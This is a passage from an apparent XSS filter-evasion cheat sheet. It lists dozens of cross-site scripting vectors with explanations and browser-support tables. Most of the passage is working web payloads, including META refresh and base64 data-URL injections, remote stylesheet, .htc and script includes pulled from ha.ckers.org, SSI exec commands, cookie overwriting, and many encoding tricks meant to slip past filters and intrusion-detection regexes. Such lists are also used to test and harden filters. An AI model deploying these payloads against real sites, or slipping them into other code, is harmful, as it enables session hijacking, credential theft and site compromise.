class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="ns">NS4</span>] - - - - META - <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> - The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - META w/data:URL - <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> - This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - META w/additional URL parameter - <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> - Meta with additional URL parameter. If the target website attempts to see if the URL contains an "http://" you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Mocha - <IMG SRC="mocha:[code]"> - Mocha (Older Netscape only) - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] - - - - OBJECT - <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> - If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - OBJECT w/Embedded XSS - <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> - Using an OBJECT tag you can embed XSS directly (this is unverified). - - - Browser support: - - - Embed Flash - <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> - - Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html : - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - OBJECT w/Flash 2 - a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d); - - Using this action script inside flash can obfuscate your XSS vector. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - STYLE - <STYLE TYPE="text/javascript">alert('XSS');</STYLE> - STYLE tag (Older versions of Netscape only) - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] - - - - STYLE w/Comment - <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> - STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - STYLE w/Anonymous HTML - <XSS STYLE="xss:expression(alert('XSS'))"> - Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - STYLE w/background-image - <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> - - STYLE tag using background-image. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - STYLE w/background - <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> - - STYLE tag using background. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Stylesheet - <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> - Stylesheet - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Remote Stylesheet 1 - <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> - Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Remote Stylesheet 2 - <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> - Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Remote Stylesheet 3 - <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> - Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox. - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Remote Stylesheet 4 - <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> - Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites. - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - TABLE - <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> - Table background (who would have thought tables were XSS targets... except me, of course). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - TD - <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> - TD background. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - XML namespace - <HTML xmlns:xss> -<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> -<xss:xss>XSS</xss:xss> - -</HTML> - XML namespace. The .htc file must be located on the server as your XSS vector. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - XML data island w/CDATA - <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> - -</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> - XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - XML data island w/comment - <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> - -<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> - XML data island with comment obfuscation (doesn't use CDATA fields, but rather uses comments to break up the javascript directive) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - XML (locally hosted) - <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> -<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> - - Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - XML HTML+TIME - <HTML><BODY> -<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> - -<?import namespace="t" implementation="#default#time2"> -<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML> - - HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Commented-out Block - <!--[if gte IE 4]> -<SCRIPT>alert('XSS');</SCRIPT> -<![endif]--> - - Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Cookie Manipulation - <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> - - Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc). - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Local .htc file - <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> - This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Rename .js to .jpg - <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> - Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - SSI - <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> - - SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - PHP - <? echo('<SCR)'; -echo('IPT>alert("XSS")</SCRIPT>'); ?> - - PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - JavaScript Includes - <BR SIZE="&{alert('XSS')}"> - &JavaScript includes (works in Netscape 4.x). - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] - - - - Character Encoding Example - < -%3C -&lt -&lt; -&LT -&LT; -&#60 -&#060 -&#0060 - -&#00060 -&#000060 -&#0000060 -&#60; -&#060; -&#0060; -&#00060; -&#000060; -&#0000060; -&#x3c -&#x03c -&#x003c -&#x0003c -&#x00003c -&#x000003c -&#x3c; -&#x03c; - -&#x003c; -&#x0003c; -&#x00003c; -&#x000003c; -&#X3c -&#X03c -&#X003c -&#X0003c -&#X00003c -&#X000003c -&#X3c; -&#X03c; -&#X003c; -&#X0003c; -&#X00003c; -&#X000003c; -&#x3C - -&#x03C -&#x003C -&#x0003C -&#x00003C -&#x000003C -&#x3C; -&#x03C; -&#x003C; -&#x0003C; -&#x00003C; -&#x000003C; -&#X3C -&#X03C -&#X003C -&#X0003C -&#X00003C -&#X000003C - -&#X3C; -&#X03C; -&#X003C; -&#X0003C; -&#X00003C; -&#X000003C; -\x3c -\x3C -\u003c -\u003C - All of the possible combinations of the character "<" in HTML and JavaScript. Most of these won't render, but many of them can get rendered in certain circumstances (standards are great, aren't they?). - - - Browser support: - - - Case Insensitive - <IMG SRC=JaVaScRiPt:alert('XSS')> - Case insensitive XSS attack vector. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - HTML Entities - <IMG SRC=javascript:alert(&quot;XSS&quot;)> - HTML entities (the semicolons are required for this to work). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Grave Accents - <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> - Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Image w/CharCode - <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> - If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - UTF-8 Unicode Encoding - <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> - - UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Long UTF-8 Unicode w/out Semicolons - <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> - - Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an html encoded string (I've seen this in the wild). - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - DIV w/Unicode - <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> - DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Hex Encoding w/out Semicolons - <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> - - Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string = ~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters). - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - UTF-7 Encoding - <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- - - UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google's custom 404 script. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Escaping JavaScript escapes - \";alert('XSS');// - Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a="";alert('XSS');//";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - End title tag - </TITLE><SCRIPT>alert("XSS");</SCRIPT> - This is a simple XSS vector that closes TITLE tags, which can encapsulate the malicious cross site scripting attack. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - STYLE w/broken up JavaScript - <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> - STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Embedded Tab - <IMG SRC="jav ascript:alert('XSS');"> - Embedded tab to break up the cross site scripting attack. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Embedded Encoded Tab - <IMG SRC="jav&#x09;ascript:alert('XSS');"> - Embedded encoded tab to break up XSS. For some reason Opera does not allow the encoded tab, but it does allow the previous tab XSS and encoded newline and carriage returns below. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Embedded Newline - <IMG SRC="jav&#x0A;ascript:alert('XSS');"> - Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Embedded Carriage Return - <IMG SRC="jav&#x0D;ascript:alert('XSS');"> - Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Multiline w/Carriage Returns - <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > - - Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector). - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Null Chars 1 - perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out - - Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Null Chars 2 - perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out - - Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I've seen this vector bypass some of the most restrictive XSS filters to date - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Spaces/Meta Chars - <IMG SRC=" &#14; javascript:alert('XSS');"> - Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:" - which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Non-Alpha/Non-Digit - <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> - Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s" - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Non-Alpha/Non-Digit Part 2 - <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> - Non-alpha-non-digit XSS part 2. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here. - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - No Closing Script Tag - <SCRIPT SRC=http://ha.ckers.org/xss.js - In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally. - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Protocol resolution in script tags - <SCRIPT SRC=//ha.ckers.org/.j> - This particular variant was submitted by Lukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the MIME type because the browser knows it in context of a SCRIPT tag. - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Half-Open HTML/JavaScript - <IMG SRC="javascript:alert('XSS')" - Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the "javascript:" directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close > tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex: - /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ -As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Double open angle brackets - <IFRAME SRC=http://ha.ckers.org/scriptlet.html < - This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - Extraneous Open Brackets - <<SCRIPT>alert("XSS");//<</SCRIPT> - (Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - Malformed IMG Tags - <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> - Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - No Quotes/Semicolons - <SCRIPT>a=/XSS/ -alert(a.source)</SCRIPT> - No single quotes or double quotes or semicolons. - - - Browser support: [<span class="s">IE6.0</span>|<span 